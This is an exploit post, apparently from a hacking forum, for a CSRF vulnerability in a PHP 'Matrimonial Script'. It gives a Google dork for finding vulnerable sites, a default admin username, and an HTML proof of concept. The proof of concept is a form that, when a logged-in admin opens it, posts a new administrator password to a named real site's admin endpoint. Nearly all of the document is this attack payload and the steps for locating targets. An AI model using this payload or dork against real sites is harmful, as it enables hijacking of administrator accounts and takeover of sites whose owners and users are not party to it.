H
HackSpawN
Code:
======================================================================================================================================
| # Title : Matrimonial Script CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.scubez.net/ |
| # Dork : "printprofile.php?id=" |
======================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Save code as poc.html file.
[+] Default user for admin = admin
<td class="headertext" width="97%">SET ADMIN PASSWORD </td>
</tr>
</tbody></table>
<br>
<table width="98%" cellspacing="0" cellpadding="0" border="0" align="center">
<tbody><tr>
<td><div class="smalltextgrey" align="center">
<div class="smalltextred" align="left"> Below is the list of Administrator Password. You can change/edit admin's password </div>
</div></td>
</tr>
</tbody></table>
<br>
<form name="signupForm" id="signupForm" method="post" action="http://www.sweetsathi.com/admin/adminpass_submit.php" onsubmit="return Check_form();">
<table class="blackbox" width="50%" cellspacing="3" cellpadding="3" border="0" align="center">
<tbody><tr>
<td width="40%">New Password : </td>
<td width="60%"><input name="txtp" id="txtp" type="password"></td>
</tr>
<tr>
<td>Confirm Password : </td>
<td><input name="txtcp" id="txtcp" type="password"></td>
</tr>
<tr>
<td> </td>
<td><input name="Submit" value="Submit" type="submit"></td>
</tr>
</tbody></table>
</form>
<p> </p></td>
